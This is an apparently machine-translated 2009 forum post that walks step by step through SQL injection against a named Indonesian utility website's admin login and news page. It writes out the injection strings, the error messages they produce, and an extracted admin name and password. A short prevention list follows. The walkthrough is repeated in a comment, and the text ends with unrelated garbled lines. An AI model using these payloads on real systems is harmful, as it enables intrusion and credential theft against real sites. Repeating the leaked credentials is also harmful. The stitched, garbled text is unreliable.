Академический Документы
Профессиональный Документы
Культура Документы
solikin sub
agung
Breaking the Web with Step-by-Step SQL Injection
Submitted by ArBoy on Sun, 18/10/2009 - 15:54
Until March 2006, there is still a web site in the Republic of Indonesia is broken with SQL Injection
techniques. You know how dangerous this one bug? Here we will present step by step SQL Injection is
directly taken from the writings iko (iko94@yahoo.com)
We take the easiest first, by way of the input box. Then we search box for admin login.
Found in www.pln-wilkaltim.co.id/sipm/admin/admin.asp
The first step to determine the table name and fieldnya,
we inject NIP box with the command (the password is up, let the branch aja): 'having 1 = 1 --
do not forget to write the single quotes and double hyphens (important).
The second meaning can be a sign they will be looking at the tutorial SQL Injection
in this www.neoteker.or.id (see archives above).
Then will come out error message:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/ sipm / admin / dologin.asp, line 7
-------
Get out of our first field name!
Write down the name of the table: T_ADMIN
Note the name field: NO
Next we inject:
'Union select sum (NIP) from T_ADMIN -
Going out error messages:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum
or average aggregate operation can not take a char data
type as an argument.
/ sipm / admin / dologin.asp, line 7
-------
Means bertype char NIP column.
We must repeat the above command to column
next to the road in nama_kolom change:
'Union select sum (nama_kolom) from T_ADMIN -
with the next column.
We have 7 type column:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
Next we inject:
'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where
NAME = 'bill' -
note: must be a line (not cut).
Going out error:
-------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax
error converting the nvarchar value 'm @ mpusk @ u' to a
column of data type int.
/ sipm / admin / dologin.asp, line 7
-------
This means that we succeed!
We get
[+] NAME = bill
[+] PASSWORD = m @ mpusk @ u
We inject it:
'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMIN
where NAME = 'bill' -
note: must be a single line.
Duarrrrrr ... ... ....
Glhodhak ... ... ... ....
Straight into the admin menu.
Remember: do not make damage! tell the admin!
We inject it:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119 'having 1 = 1 --
going out error message:
---------
Microsoft OLE DB Provider for ODBC Drivers (0 × 80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/ dari_Media.asp, line 58
---------
means 'tb_news.NewsId' is the name of our tables and columns
first.
************************************************** ****
SPECIAL FOR ADMIN & WEB PROGRAMMER!
************************************************** ****
How to prevent common use:
1. Limit the length of the input box (if possible), with
how to limit the program code, so the cracker beginners
will be confused for a moment to see her input box can not in
inject with a long command.
2. Filter input is entered by the user, especially the use of
single quotes (Input Validation).
3. Turn off or hide error messages that came out
from SQL Server is running.
4. Turn off the standard facilities such as Stored Procedures,
Extended Stored Procedures if possible.
5. Change "Startup and run SQL Server" using low privilege user
in SQL Server Security tab.
crazy ..
* Reply
pertamax gan!
* Reply
Hahaha
Q Try Now
Database B
Next we inject:
'Union select sum (NIP) from T_ADMIN --
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] The sum
or average aggregate operation can not take a char data
type as an argument.
/ sipm / admin / dologin.asp, line 7
--------------------
Means bertype char NIP column.
Next we inject:
'Union select min (PASSWORD), 1,1,1,1,1,1 from T_ADMIN where
NAME = 'bill' --
note: must be a line (not cut).
Going out error:
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax
error converting the nvarchar value 'm @ mpusk @ u' to a
column of data type int.
/ sipm / admin / dologin.asp, line 7
---------------------
This means that we succeed!
We get
[] NAME = bill
[] PASSWORD = m @ @ u mpusk
We inject it:
'Union select min (KD_RANTING), 1,1,1,1,1,1 from T_ADMIN
where NAME = 'bill' --
note: must be a single line.
Duarrrrrr ..........
Glhodhak .............
Straight into the admin menu.
Remember: do not make damage! tell the admin!
We inject it:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119 'having 1 = 1 --
going out error message:
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft] [ODBC SQL Server Driver] [SQL Server] Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/ dari_Media.asp, line 58
---------------------------
means 'tb_news.NewsId' is the name of our tables and columns
first.
************************************************** ****
SPECIAL FOR ADMIN & WEB PROGRAMMER!
************************************************** ****
How to prevent common use:
1. Limit the length of the input box (if possible), with
how to limit the program code, so the cracker beginners
will be confused for a moment to see her input box can not in
inject with a long command.
2. Filter input is entered by the user, especially the use of
single quotes (Input Validation).
3. Turn off or hide error messages that came out
from SQL Server is running.
4. Turn off the standard facilities such as Stored Procedures,
Extended Stored Procedures if possible.
5. Change "Startup and run SQL Server" using low privilege user
in SQL Server Security tab.
Reference:
[] Sqlinjection, www.BlackAngels.it
[] Anvanced sql injection in sql server applications
(www.ngssoftware.com)
[] Sql injection walktrough (www.securiteam.com
eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry again
drinking to pay the debt when the refundable credit, day and night thinking about debt
eat drink married to assistant cook in charge of cleaning the room cleaned cooked meals to marry again
drinking to pay the debt when the refundable credit, day and night thinking about debt